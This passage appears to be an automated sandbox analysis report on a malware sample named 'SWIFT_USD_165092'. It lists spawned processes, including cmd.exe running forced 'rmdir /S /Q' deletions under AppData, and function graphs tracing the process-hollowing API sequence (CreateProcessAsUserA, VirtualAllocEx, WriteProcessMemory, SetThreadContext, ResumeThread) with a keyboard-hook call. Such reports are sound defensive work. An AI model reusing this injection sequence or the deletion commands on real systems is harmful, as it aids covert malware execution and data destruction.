                                                                                      MD5 hash:6B7D2FC3FB98B10A5F77B23DEF745F6F
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:55
                                                                                      Start time:19:51:16
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\88560075-49ce-438f-ba24-9980eb388270
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:56
                                                                                      Start time:19:51:16
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:57
                                                                                      Start time:19:51:16
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:58
                                                                                      Start time:19:51:32
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\System32\cmd.exe" /c rmdir /S /Q "C:\Users\user\AppData\Local\Logs\22-05-2023
                                                                                      Imagebase:0x11d0000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Target ID:59
                                                                                      Start time:19:51:33
                                                                                      Start date:22/05/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7fcd70000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:19.4%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:4.3%
                                                                                        Total number of Nodes:69
                                                                                        Total number of Limit Nodes:2
                                                                                        execution_graph 4377 1280448 4378 128044e 4377->4378 4379 1280458 4378->4379 4381 1281ef7 4378->4381 4382 1281f02 4381->4382 4386 1283668 4382->4386 4390 1283658 4382->4390 4383 1281f32 4383->4379 4387 1283679 4386->4387 4388 128368b 4387->4388 4394 12849ac 4387->4394 4388->4383 4391 1283679 4390->4391 4392 128368b 4391->4392 4393 12849ac 12 API calls 4391->4393 4392->4383 4393->4391 4395 12849b7 4394->4395 4396 1284aea 4395->4396 4426 1285020 4395->4426 4430 1285014 4395->4430 4404 1284dd9 4396->4404 4434 1285518 4396->4434 4437 1285510 4396->4437 4397 1284e30 4454 12857e0 4397->4454 4457 12857e8 4397->4457 4398 1284e58 4398->4387 4399 1284bc6 4440 1285600 4399->4440 4443 1285608 4399->4443 4400 1284c3d 4401 1284c7f 4400->4401 4424 1285608 VirtualAllocEx 4400->4424 4425 1285600 VirtualAllocEx 4400->4425 4401->4404 4446 12856a8 4401->4446 4450 12856b0 4401->4450 4402 1284ca8 4403 1284d98 4402->4403 4414 12856a8 WriteProcessMemory 4402->4414 4415 12856b0 WriteProcessMemory 4402->4415 4418 12856a8 WriteProcessMemory 4403->4418 4419 12856b0 WriteProcessMemory 4403->4419 4405 1284e13 4404->4405 4460 1285458 4404->4460 4464 1285450 4404->4464 4405->4397 4422 1285458 SetThreadContext 4405->4422 4423 1285450 SetThreadContext 4405->4423 4414->4402 4415->4402 4418->4404 4419->4404 4422->4397 4423->4397 4424->4401 4425->4401 4428 12850ad CreateProcessAsUserA 4426->4428 4429 12852c8 4428->4429 4429->4429 4431 1285020 CreateProcessAsUserA 4430->4431 4433 12852c8 4431->4433 4433->4433 4435 1285560 ReadProcessMemory 4434->4435 4436 128559d 4435->4436 4436->4399 4438 1285560 ReadProcessMemory 4437->4438 4439 128559d 4438->4439 4439->4399 4441 128564b VirtualAllocEx 4440->4441 4442 1285682 4441->4442 4442->4400 4444 128564b VirtualAllocEx 4443->4444 4445 1285682 4444->4445 4445->4400 4447 12856fb WriteProcessMemory 4446->4447 4449 128574c 4447->4449 4449->4402 4451 12856fb WriteProcessMemory 4450->4451 4453 128574c 4451->4453 4453->4402 4455 1285829 ResumeThread 4454->4455 4456 1285856 4455->4456 4456->4398 4458 1285829 ResumeThread 4457->4458 4459 1285856 4458->4459 4459->4398 4461 12854a0 SetThreadContext 4460->4461 4463 12854de 4461->4463 4463->4405 4465 12854a0 SetThreadContext 4464->4465 4467 12854de 4465->4467 4467->4405

                                                                                        Executed Functions

                                                                                        Function 01285020 Relevance: 1.8, APIs: 1, Instructions: 262processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 131 1285020-12850b9 133 12850bb-12850e0 131->133 134 128510d-128512f 131->134 133->134 137 12850e2-12850e4 133->137 138 1285131-1285159 134->138 139 1285186-12851b6 134->139 140 12850e6-12850f0 137->140 141 1285107-128510a 137->141 138->139 149 128515b-128515d 138->149 147 12851b8-12851dd 139->147 148 128520a-12852c6 CreateProcessAsUserA 139->148 142 12850f2 140->142 143 12850f4-1285103 140->143 141->134 142->143 143->143 146 1285105 143->146 146->141 147->148 157 12851df-12851e1 147->157 161 12852c8-12852ce 148->161 162 12852cf-1285343 148->162 150 128515f-1285169 149->150 151 1285180-1285183 149->151 154 128516b 150->154 155 128516d-128517c 150->155 151->139 154->155 155->155 156 128517e 155->156 156->151 159 12851e3-12851ed 157->159 160 1285204-1285207 157->160 163 12851ef 159->163 164 12851f1-1285200 159->164 160->148 161->162 173 1285353-1285357 162->173 174 1285345-1285349 162->174 163->164 164->164 165 1285202 164->165 165->160 176 1285359-128535d 173->176 177 1285367-128536b 173->177 174->173 175 128534b 174->175 175->173 176->177 178 128535f 176->178 179 128537b-128537f 177->179 180 128536d-1285371 177->180 178->177 182 1285391-1285398 179->182 183 1285381-1285387 179->183 180->179 181 1285373 180->181 181->179 184 128539a-12853a9 182->184 185 12853af 182->185 183->182 184->185 187 12853b0 185->187 187->187
                                                                                        APIs
                                                                                        • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 012852B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID:
                                                                                        • API String ID: 2217836671-0
                                                                                        • Opcode ID: 5c02af9419cb1b04bcdc203948c77155705db4ff587ae7908c2465c25b6138c0
                                                                                        • Instruction ID: 5341a2c1ea75b453f1ab2102b1fc908e1a12332058b01679e27975014de317d6
                                                                                        • Opcode Fuzzy Hash: 5c02af9419cb1b04bcdc203948c77155705db4ff587ae7908c2465c25b6138c0
                                                                                        • Instruction Fuzzy Hash: 5FA18971E112198FEB10DFA8C8817DDBBF2FF48304F0481A9E919A7291DB749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01285014 Relevance: 1.8, APIs: 1, Instructions: 265processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 73 1285014-12850b9 76 12850bb-12850e0 73->76 77 128510d-128512f 73->77 76->77 80 12850e2-12850e4 76->80 81 1285131-1285159 77->81 82 1285186-12851b6 77->82 83 12850e6-12850f0 80->83 84 1285107-128510a 80->84 81->82 92 128515b-128515d 81->92 90 12851b8-12851dd 82->90 91 128520a-12852c6 CreateProcessAsUserA 82->91 85 12850f2 83->85 86 12850f4-1285103 83->86 84->77 85->86 86->86 89 1285105 86->89 89->84 90->91 100 12851df-12851e1 90->100 104 12852c8-12852ce 91->104 105 12852cf-1285343 91->105 93 128515f-1285169 92->93 94 1285180-1285183 92->94 97 128516b 93->97 98 128516d-128517c 93->98 94->82 97->98 98->98 99 128517e 98->99 99->94 102 12851e3-12851ed 100->102 103 1285204-1285207 100->103 106 12851ef 102->106 107 12851f1-1285200 102->107 103->91 104->105 116 1285353-1285357 105->116 117 1285345-1285349 105->117 106->107 107->107 108 1285202 107->108 108->103 119 1285359-128535d 116->119 120 1285367-128536b 116->120 117->116 118 128534b 117->118 118->116 119->120 121 128535f 119->121 122 128537b-128537f 120->122 123 128536d-1285371 120->123 121->120 125 1285391-1285398 122->125 126 1285381-1285387 122->126 123->122 124 1285373 123->124 124->122 127 128539a-12853a9 125->127 128 12853af 125->128 126->125 127->128 130 12853b0 128->130 130->130
                                                                                        APIs
                                                                                        • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 012852B3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID:
                                                                                        • API String ID: 2217836671-0
                                                                                        • Opcode ID: 1d7c304f6f2ec0c35cf8450c308f8b934d83a90d5394b09c8f7340f5cc03e8c8
                                                                                        • Instruction ID: eea8da063d16613b8e3f5a9b55f7598257cfa3deee5537f93eecac91d4671a6c
                                                                                        • Opcode Fuzzy Hash: 1d7c304f6f2ec0c35cf8450c308f8b934d83a90d5394b09c8f7340f5cc03e8c8
                                                                                        • Instruction Fuzzy Hash: A0A18B71E112199FEB10DFA8C8817DDBBF2FF48304F0481A9E919A7291DB749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012856A8 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 188 12856a8-1285701 190 1285711-128574a WriteProcessMemory 188->190 191 1285703-128570f 188->191 192 128574c-1285752 190->192 193 1285753-1285774 190->193 191->190 192->193
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0128573D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: a3427504897f091b21ef7317687a9ebba76c6f877ea35d57d820f77222bf41af
                                                                                        • Instruction ID: 17f9e3e207eeb347b72aa219f64e669f3c1b675c6751c5e07384fc860e17347a
                                                                                        • Opcode Fuzzy Hash: a3427504897f091b21ef7317687a9ebba76c6f877ea35d57d820f77222bf41af
                                                                                        • Instruction Fuzzy Hash: 0B2105B1910249DFCB14DFAAC884BDEBBF4FB48320F10842AE919E7250D778A945CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012856B0 Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 195 12856b0-1285701 197 1285711-128574a WriteProcessMemory 195->197 198 1285703-128570f 195->198 199 128574c-1285752 197->199 200 1285753-1285774 197->200 198->197 199->200
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0128573D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 4f69e1d6dd33ff4f69d5348d83472956d3ff0ef3e8bfabc8e3a1673898e80340
                                                                                        • Instruction ID: 852fb1e58e5d7027e778cae110f1c7a7b7aa10b1633b9b6ed76ec3b1750aaa3a
                                                                                        • Opcode Fuzzy Hash: 4f69e1d6dd33ff4f69d5348d83472956d3ff0ef3e8bfabc8e3a1673898e80340
                                                                                        • Instruction Fuzzy Hash: C32112B1910209DFCB14DF9AC884BDEBBF4FB48320F50842AE919A7250D778A940CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01285450 Relevance: 1.6, APIs: 1, Instructions: 60threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 202 1285450-12854a4 204 12854b0-12854dc SetThreadContext 202->204 205 12854a6-12854ae 202->205 206 12854de-12854e4 204->206 207 12854e5-1285506 204->207 205->204 206->207
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 012854CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: d29c4ba38ce6e51728b3ac29c4b5cf4c753e35f1cef9fc49a8cacfd56b35b4c8
                                                                                        • Instruction ID: add73ccbef2448fa1ba8f1aee78024df5d707a993a22cebc7cc288f4731821cb
                                                                                        • Opcode Fuzzy Hash: d29c4ba38ce6e51728b3ac29c4b5cf4c753e35f1cef9fc49a8cacfd56b35b4c8
                                                                                        • Instruction Fuzzy Hash: 332127B1D1061A9FCB10CFAAC5847EEFBF4FB48321F148169D418B3240D778A9458FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01285510 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 216 1285510-128559b ReadProcessMemory 218 128559d-12855a3 216->218 219 12855a4-12855c5 216->219 218->219
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0128558E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 6a033f03432b7708cf47a001ee226b3ba85e74d2728010d3ece3db876fd56bf4
                                                                                        • Instruction ID: 2e98274a17d53bf3a15d19ba7152313551c3c529da1bc617aa650fcd0b1db3eb
                                                                                        • Opcode Fuzzy Hash: 6a033f03432b7708cf47a001ee226b3ba85e74d2728010d3ece3db876fd56bf4
                                                                                        • Instruction Fuzzy Hash: 6E21E3B19002499FCB10CFAAD984ADEBBF4EB48320F148429E959A7250D3799645DFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01285458 Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 209 1285458-12854a4 211 12854b0-12854dc SetThreadContext 209->211 212 12854a6-12854ae 209->212 213 12854de-12854e4 211->213 214 12854e5-1285506 211->214 212->211 213->214
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 012854CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID:
                                                                                        • API String ID: 1591575202-0
                                                                                        • Opcode ID: a00dc8881b96aee6bc0a28947fc4e3e6b64b806928ed42d88f568a56f6d4eb58
                                                                                        • Instruction ID: 2957e955d3a2c3130759fcc295dc5b97f370143f680732c18d2a1ff40c558590
                                                                                        • Opcode Fuzzy Hash: a00dc8881b96aee6bc0a28947fc4e3e6b64b806928ed42d88f568a56f6d4eb58
                                                                                        • Instruction Fuzzy Hash: C62124B1E1061A9FCB10CF9AC9847DEFBF4FB48320F10812AD518B3240D778A9448FA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01285518 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 221 1285518-128559b ReadProcessMemory 223 128559d-12855a3 221->223 224 12855a4-12855c5 221->224 223->224
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0128558E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: ecfe1c1036fd2fa30e838c08f774722404e03af4bcaa6bd491d70086bf36d761
                                                                                        • Instruction ID: dc90d3fa306dc025fd6c725daef17381bb3b0c7f91e4bda5cb8548179d6153e5
                                                                                        • Opcode Fuzzy Hash: ecfe1c1036fd2fa30e838c08f774722404e03af4bcaa6bd491d70086bf36d761
                                                                                        • Instruction Fuzzy Hash: 9A2103B19002499FCB10CF9AD984BDEBBF4FF48320F108429E918A7250D378A645DFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01285600 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 226 1285600-1285680 VirtualAllocEx 228 1285689-128569d 226->228 229 1285682-1285688 226->229 229->228
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01285673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 73554381fc5949410c01d40061a5c7f8538731f6930743dd246a206b61cf4fe6
                                                                                        • Instruction ID: 5118e11f8f7bf346a3e020055c08ab7bb690fc55d16c86f5ace151665492f452
                                                                                        • Opcode Fuzzy Hash: 73554381fc5949410c01d40061a5c7f8538731f6930743dd246a206b61cf4fe6
                                                                                        • Instruction Fuzzy Hash: 0A1113B5800249DFCB20CF9AD984BDEBFF4FB48324F108459E519A7650C375A955CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01285608 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 231 1285608-1285680 VirtualAllocEx 233 1285689-128569d 231->233 234 1285682-1285688 231->234 234->233
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01285673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: c3e7ba9811929f39deb3c0269c315b842cf440dc37b6e534c840a47d5d9864ac
                                                                                        • Instruction ID: 47b3d6c8527d6da61a9158bf387c1df3644783a8e6cff1ad2e63d9878c53421f
                                                                                        • Opcode Fuzzy Hash: c3e7ba9811929f39deb3c0269c315b842cf440dc37b6e534c840a47d5d9864ac
                                                                                        • Instruction Fuzzy Hash: 7A11F2B5900249DFCB20DF9AD984BDEBFF4FB48324F108459E529A7250C375A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012857E0 Relevance: 1.5, APIs: 1, Instructions: 45threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 236 12857e0-1285854 ResumeThread 238 128585d-1285871 236->238 239 1285856-128585c 236->239 239->238
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 3f0fc620adc212d7aa394d78951bff920b9cd41e4fcb657c954c2eb3946b1a1e
                                                                                        • Instruction ID: 7268577f65201ab43e44fbb8db6c7465e951e486f6d128d1e660bf7b60fa8cea
                                                                                        • Opcode Fuzzy Hash: 3f0fc620adc212d7aa394d78951bff920b9cd41e4fcb657c954c2eb3946b1a1e
                                                                                        • Instruction Fuzzy Hash: F81103B1C102498FCB20DFAAD584BDEBFF4EB48324F20845AD559B7650C375A985CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012857E8 Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 241 12857e8-1285854 ResumeThread 243 128585d-1285871 241->243 244 1285856-128585c 241->244 244->243
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.399508044.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1280000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: c32b9b43d915cab4db1fdfb106bae003390c64aca2664f19a744e490e1c3daa3
                                                                                        • Instruction ID: 3ef75003030fc3a314dbe155e2f511e7bc5c45a5d57e361ab2ce2974de5603b5
                                                                                        • Opcode Fuzzy Hash: c32b9b43d915cab4db1fdfb106bae003390c64aca2664f19a744e490e1c3daa3
                                                                                        • Instruction Fuzzy Hash: C711E2B1C102498FCB20DF9AD584BDEBFF4EB48324F20846AD519B7650C775A984CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:16.2%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:9
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 13859 d7e2d0 13862 d7e314 SetWindowsHookExW 13859->13862 13861 d7e35a 13862->13861 13863 d725f0 13864 d7260e 13863->13864 13867 d721cc 13864->13867 13866 d72645 13869 d74110 LoadLibraryA 13867->13869 13870 d74209 13869->13870

                                                                                        Executed Functions

                                                                                        Function 06B42D08 Relevance: 3.4, Strings: 2, Instructions: 851COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 6b42d08-6b42d34 1 6b42d3e-6b42d51 0->1 2 6b42d57-6b42d6b 1->2 3 6b43972-6b439c0 1->3 2->3 4 6b42d71-6b42d7f 2->4 7 6b439c2-6b439d5 3->7 8 6b439da-6b439f9 3->8 4->3 6 6b42d85-6b42d93 4->6 6->3 9 6b42d99-6b42dae 6->9 7->8 17 6b43a1d-6b43a36 8->17 18 6b439fb-6b43a0b 8->18 9->3 10 6b42db4-6b42ddc 9->10 10->3 12 6b42de2-6b42ded 10->12 13 6b42def-6b42df6 12->13 14 6b42df8-6b42dff 12->14 16 6b42e02-6b42e15 13->16 14->16 21 6b42e56-6b42e63 16->21 22 6b42e17-6b42e4f 16->22 23 6b43a41 17->23 24 6b43a38 17->24 26 6b43a10-6b43a1b 18->26 27 6b43a0d 18->27 31 6b42e65-6b42e6b 21->31 32 6b42e6d 21->32 22->21 24->23 26->17 26->18 27->26 34 6b42e74-6b42e83 31->34 32->34 35 6b42e85 34->35 36 6b42e8c-6b42e9a 34->36 35->36 36->3 37 6b42ea0-6b42ebe 36->37 37->3 38 6b42ec4-6b42ede 37->38 38->3 39 6b42ee4-6b42f07 38->39 39->3 40 6b42f0d-6b42f21 39->40 40->3 41 6b42f27-6b42f4a 40->41 41->3 42 6b42f50-6b42f5b 41->42 43 6b42f66-6b42f77 42->43 44 6b42f5d-6b42f64 42->44 43->3 46 6b42f7d-6b42f8b 43->46 44->43 45 6b42f96-6b42fac 44->45 45->3 48 6b42fb2-6b42fd4 45->48 46->3 47 6b42f91 46->47 47->45 48->3 49 6b42fda-6b42ffc 48->49 49->3 50 6b43002-6b4302d 49->50 50->3 51 6b43033-6b43047 50->51 51->3 52 6b4304d-6b4306f 51->52 52->3 53 6b43075-6b43097 52->53 53->3 54 6b4309d-6b430c8 53->54 54->3 55 6b430ce-6b430df 54->55 57 6b43104-6b43127 55->57 58 6b430e1 55->58 57->3 60 6b4312d-6b4316b 57->60 59 6b430e3-6b430ee 58->59 59->3 61 6b430f4-6b430fd 59->61 60->3 62 6b43171-6b431af 60->62 61->59 63 6b430ff 61->63 62->3 64 6b431b5-6b431eb 62->64 65 6b432b9-6b432de 63->65 64->3 66 6b431f1-6b4320d 64->66 65->3 70 6b432e4-6b432fe 65->70 66->3 67 6b43213-6b43243 66->67 67->3 69 6b43249-6b43279 67->69 69->3 71 6b4327f-6b432af 69->71 70->3 72 6b43304-6b4333d 70->72 71->3 73 6b432b5 71->73 77 6b4333f-6b43357 72->77 78 6b43359-6b43367 72->78 73->65 79 6b4336d-6b43382 77->79 78->79 79->3 80 6b43388-6b433a2 79->80 80->3 81 6b433a8-6b433bc 80->81 82 6b433be-6b433d6 81->82 83 6b433d8-6b433e6 81->83 84 6b433ec-6b43410 82->84 83->84 86 6b43412-6b43435 84->86 87 6b4344e-6b4345c 84->87 101 6b43437 86->101 102 6b4343d-6b4343f 86->102 88 6b43462-6b43475 87->88 89 6b43571-6b43586 88->89 90 6b4347b-6b4348e 88->90 89->3 94 6b4358c-6b435a0 89->94 92 6b43490-6b434a6 90->92 93 6b434a8-6b434bd 90->93 92->93 95 6b434f3-6b43515 92->95 93->3 96 6b434c3-6b434d7 93->96 94->3 98 6b435a6-6b435b1 94->98 95->3 100 6b4351b-6b43553 95->100 96->3 99 6b434dd-6b434ee 96->99 103 6b435b7-6b435d9 98->103 99->103 100->3 104 6b43559-6b4356f 100->104 105 6b43441 101->105 106 6b43439-6b4343b 101->106 107 6b43446-6b4344c 102->107 108 6b43603-6b43627 103->108 109 6b435db-6b43601 103->109 104->103 105->107 106->102 